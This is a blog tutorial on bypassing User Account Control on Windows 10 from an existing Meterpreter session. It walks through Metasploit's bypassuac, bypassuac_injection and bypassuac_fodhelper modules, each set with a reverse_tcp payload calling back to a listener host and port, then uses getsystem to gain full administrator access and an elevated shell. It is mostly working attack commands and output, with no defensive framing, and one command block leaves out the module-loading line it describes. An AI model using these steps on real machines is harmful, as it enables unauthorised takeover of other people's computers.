Bypassing UAC in Windows 10

Utilizing Meterpreter we have started a session with our target machine. The machine is running Windows 10, and we need to gain administrator privileges.

If you try using the usual getsystem command, it fails with an error. Usually you can utilize the bypassuac module, but I have experienced that this also fails with a message that this version of windows 10 is not vulnerable to this attack.

In this blog we will explore the way to solve the problem of the getsystem error and bypassuac failing in windows 10.

I will assume that you have already created your payload, and initiated the reverse_tcp connection wit the target machine. We are now connected and in the Meterpreter terminal.

Meterpreter connection with target

If we run getuid you can see the username we are logged in with

getsystem attempts to gain us administrator privileges, but fails.

getuid on Meterpreter

Usually at this point we could switch to using bypassuac to gain administrator privileges.

meterpreter > background
msf6 > set session 1
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

Above commands will background the open Meterpreter session, load the bypassuac module, set the payload and run the exploit. However on windows 10 it will fail with the message :-

[-] Exploit aborted due to failure: not-vulnerable: Windows 10 (10.0 Build 17763). is not vulnerable.

bypassuac fails on windows 10

Another method would be the bypassuac_injection method.

msf6 > use exploit/windows/local/bypassuac_injection
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

When we run this we get a failure with error message

[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System

bypassuac_injection fails on windows 10

If we switch back to our active session with sessions –i 1 and run getsystem again, we still get same failure

getsystem fails on windows 10

So what can we do on windows 10 to get around this problem?

We can use the bypassuac with the addition of fodhelper. Let’s take a look at how this works out

msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

The result of this is that the windows fodhelper.exe is spawned under a new shell that has UAC switched off.

bypassuac_fodhelper works on windows 10

You will now be back inside your session, sysinfo and getuid will both give the same details as before.

connected to windows 10 with Meterpreter

Now when you run getsystem I will be succesful

meterpreter > getsystem
meterpreter > getuid
getuid admin on windows 10

You now have full administrator access to the windows 10 machine. if you execute the shell command, it will give you a command prompt with full administrator privileges.

start shell as admin on windows 10 with Meterpreter

Buy me a coffee

If you found this article useful and interesting please consider buying me a coffee!

$2.50

Advertisement

One thought on “Bypassing UAC in Windows 10

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: